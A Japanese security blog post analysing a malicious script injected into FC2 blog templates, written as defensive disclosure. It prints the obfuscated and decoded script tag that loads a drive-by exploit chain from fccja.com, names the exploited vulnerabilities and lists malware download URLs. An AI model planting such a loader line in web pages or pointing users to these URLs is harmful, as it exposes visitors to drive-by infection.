忍者ブログ

ハルファ紀行

fccja.comその1

いくつかのFC2ブログのテンプレートに新たなscriptが仕込まれています。
<script language="javascript" src="http://%77%77%77%2E%66%63%63%6A%61%2E%63%6F%6D/%65%2E%6A%73"></script>
デコードします。
<script language="javascript" src="http://www.fccja.com/e.js"></script>
language="javascript"ではなくtype="text/javascript"を使うべきです。

IPがhellh.netの隣なので結果はわかってはいますが、とりあえずwhoisします。
Creation Date:2008-03-20
Country:China

http://www.fccja.com/
に(iframeなどで)アクセスした場合でもDefault.htmは
<script language="javascript" src="http://www.fccja.com/e.js"></script>
となっており、e.jsが起点となっています。

e.jsはd1.asp、d2.asp、d3.aspを順にtry〜catchします。
d1.asp、d2.asp、d3.aspが狙う脆弱性は順にMS06-014(MDAC)、RealPlayer、MS07-017(アニメーションカーソル)です。

Default.htm
→e.js
 →d1.asp (スクリプトその1)
 →d2.asp (スクリプトその2)
 →d3.asp (スクリプトその3)
スクリプトを全てASPにしており、2回目のアクセスでは何も返って来ません(Content-Length: 0)。
どうでもいいことですが、<div style="display:none">とスタイルシートで非表示にしています。

MS07-017はトロイを実行させる手法としては比較的ポピュラーですが、今までのdda3.netやhellh.netでは使われていませんでした。
細工されたファイル(ani等)をWindowsが触る(GDIが描画する)だけで発動するため、ブラウザは関係ありません。
WindowsUpdateしていれば阻止できます。

http://www.fccja.com/com.exe
VirusTotal


ついでに4日経過したhellh.netを再スキャン。
http://www.hellh.net/vip.exe
VirusTotal


遅くとも2日以内には対応してほしいものです。
対応した頃にはとっくに新種に置き換わっていた、では役に立ちません。
PR

コメント

カレンダー

10 2024/11 12
S M T W T F S
1 2
3 4 5 6 8 9
10 11 12 13 14 15
17 18 19 20 21 22 23
24 25 26 27 28 29 30

フリーエリア

最新コメント

[09/14 ヨシノ]
[10/19 Dolly]
[08/22 まとめ臨時。]

最新記事

PDF
(11/16)
PDF
(11/07)
PDF
(10/29)
(10/16)
PDF
(10/05)

最新トラックバック

プロフィール

HN:
Ilion
性別:
非公開

バーコード

ブログ内検索